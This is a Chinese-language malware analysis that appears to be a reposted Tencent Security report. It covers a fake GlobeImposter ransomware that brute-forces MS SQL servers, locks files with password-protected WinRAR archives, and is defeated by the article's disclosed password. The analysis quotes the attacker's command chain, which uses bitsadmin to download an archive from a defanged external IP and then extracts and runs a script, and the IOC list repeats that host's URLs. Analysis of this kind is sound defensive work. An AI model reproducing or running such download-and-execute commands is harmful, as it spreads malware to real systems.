WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

栏目: 编程工具 · 发布时间: 5年前

内容简介:近日,腾讯安全御见威胁情报中心发现假冒GlobeImposter勒索病毒正在传播,攻击者疑通过MS SQL爆破入侵服务器,通过网络下载恶意脚本代码,继而执行加密和勒索流程。令人惊叹的是,这个所谓的“勒索病毒”执行极为简单,只是利用WinRAR加密压缩用户文件,之后再将一封GlobeImposter的勒索消息邮件修改后恐吓用户,通过邮箱联系索取酬金。腾讯安全提醒大家,如遇到此病毒,不要着急着缴纳赎金。该病毒加密压缩的密码明文写在病毒配置信息中,使用这个密码解压缩,文件就能完全恢复。分析

近日,腾讯安全御见威胁情报中心发现假冒GlobeImposter勒索病毒正在传播,攻击者疑通过MS SQL爆破入侵服务器,通过网络下载恶意脚本代码,继而执行加密和勒索流程。

令人惊叹的是,这个所谓的“勒索病毒”执行极为简单,只是利用WinRAR加密压缩用户文件,之后再将一封GlobeImposter的勒索消息邮件修改后恐吓用户,通过邮箱联系索取酬金。腾讯安全提醒大家,如遇到此病毒,不要着急着缴纳赎金。该病毒加密压缩的密码明文写在病毒配置信息中,使用这个密码解压缩,文件就能完全恢复。

分析

被勒索服务器疑似被通过MSSQL爆破入侵成功,之后执行以下相关命令行进一步下载执行恶意代码:

1 )bitsadmin  /transfer n hxxp://47.92.55[.]239/s/jr26.rar C:/Progra~1/jr26.rar

2 )C:\Windows\system32\cmd.exe /c C:\Progra~1\winrar\rar.exe e -pp.5p C:\Progra~1\jr26.rar

3 )C:\Windows\system32\cmd.exe /c C:\Progra~1\jr26.cmd

jr26.rar 为一个带密码的压缩包,密码为p.5p

WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

jr26.rar 解压后可得到一个疑似乱码的脚本文件

WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

16 进制查看可发现貌似多了0xFF 0xFE 0x0D 0x0A,目测应该是以二进制形式写入的标志,导致文本类识别 工具 无法查看

WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

去掉0xFF 0xFE 0x0D 0x0A后尝试再次打开,脚本内容已可以正常查看

WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

查看脚本内容可知,主要目的为将指定类型的文件根据后缀分类,分别使用winrar进行加密压缩(通过上图的命令行参数,我们看到加密密码为 lll.hc3t6b9s8kz5r26 ),文件将被压缩至根目录下对应的不同文件名(邮箱.ch_文件后缀类型.随机数字tiger88818)包内,同时删除原始文件。

WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

如下图[email protected]_bax.32419tiger88818包内,则被带密码压缩了所有bak类型的文件

WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

同时,为了防止加密压缩时,数据库文件被占用导致加密中止,病毒还会结束大量的数据库服务相关进程。

WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

最奇葩的来了,加密文件完成后,病毒会通过远程下载一个勒索说明文档

WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

打开说明文档,竟然是知名勒索病毒GlobeImposter的修改版本,该病毒作者只是修改了联系邮箱。

WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

进一步观察病毒使用的url可发现攻击者使用的多个文件,分别有勒索说明文档(HOW_TO_BACK_YOUR_FILE*),勒索脚本包(jr26.rar),正规的winrar压缩模块(Rar.exe),猜测为扫描器相关模块包(带未知密码的s.rar包),且病毒使用服务部署在某知名云平台服务器上。

WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

腾讯安全提醒大家,针对此病毒,可以不必着急缴纳赎金,可尝试使用Winrar打开根目录中的*tiger88818后缀文件,然后选择使用密码(lll.hc3t6b9s8kz5r26)解压到指定位置,即可恢复文件。

WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

安全建议

企业用户:

1 、尽量关闭不必要的端口,如:445、135,139等,对3389,5900等端口可进行白名单配置,只允许白名单内的IP连接登陆;

2 、尽量关闭不必要的文件共享,如有需要,请使用ACL和强密码保护来限制访问权限,禁用对共享文件夹的匿名访问;

3 、采用高强度的密码,避免使用弱口令密码,并定期更换密码。建议服务器密码使用高强度且无规律密码,并且强制要求每个服务器使用不同密码管理;

4 、对没有互联需求的服务器/工作站内部访问设置相应控制,避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器;

5 、对重要文件和数据(数据库等数据)进行定期非本地备份;

6 、教育终端用户谨慎下载陌生邮件附件,若非必要,应禁止启用Office宏代码;

7 、在终端/服务器部署专业安全防护软件,Web服务器可考虑部署在腾讯云等具备专业安全防护能力的云服务;

WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

8 、建议全网安装御点终端安全管理系统(https://s.tencent.com/product/yd/index.html)。御点终端安全管理系统具备终端杀毒统一管控、修复漏洞统一管控,以及策略管控等全方位的安全管理功能,可帮助企业管理者全面了解、管理企业内网安全状况、保护企业安全。

个人用户:

1 、启用腾讯电脑管家,勿随意打开陌生邮件,关闭Office执行宏代码;

2 、打开电脑管家的文档守护者功能,利用磁盘冗余空间自动备份数据文档,即使发生意外,数据也可有备无患。

IOCs

MD5:

36e826b4a06dcbf039fb8fd6aeca4836

e9613db5620dbcb56903b98532971582

f18b3b2dc6556d60663d70ac411c0ac8

URL

hxxp://47.92.55.239/s/HOW_TO_BACK_YOUR_FILES.txt

hxxp://47.92.55.239/s/HOW_TO_BACK_YOUR_FILESxx.rar

hxxp://47.92.55.239/s/jr26.rar

hxxp://47.92.55.239/s/Rar.exe

hxxp://47.92.55.239/s/s.rar


以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

Ruby for Rails

Ruby for Rails

David Black / Manning Publications / 2006-05-11 / USD 44.95

What's Inside * How Ruby and Rails work, separately and together * Extensive Ruby language tutorial * Ruby techniques for Rails applications * Explore the Rails framework source code A new level of pr......一起来看看 《Ruby for Rails》 这本书的介绍吧!

XML、JSON 在线转换
XML、JSON 在线转换

在线XML、JSON转换工具

HSV CMYK 转换工具
HSV CMYK 转换工具

HSV CMYK互换工具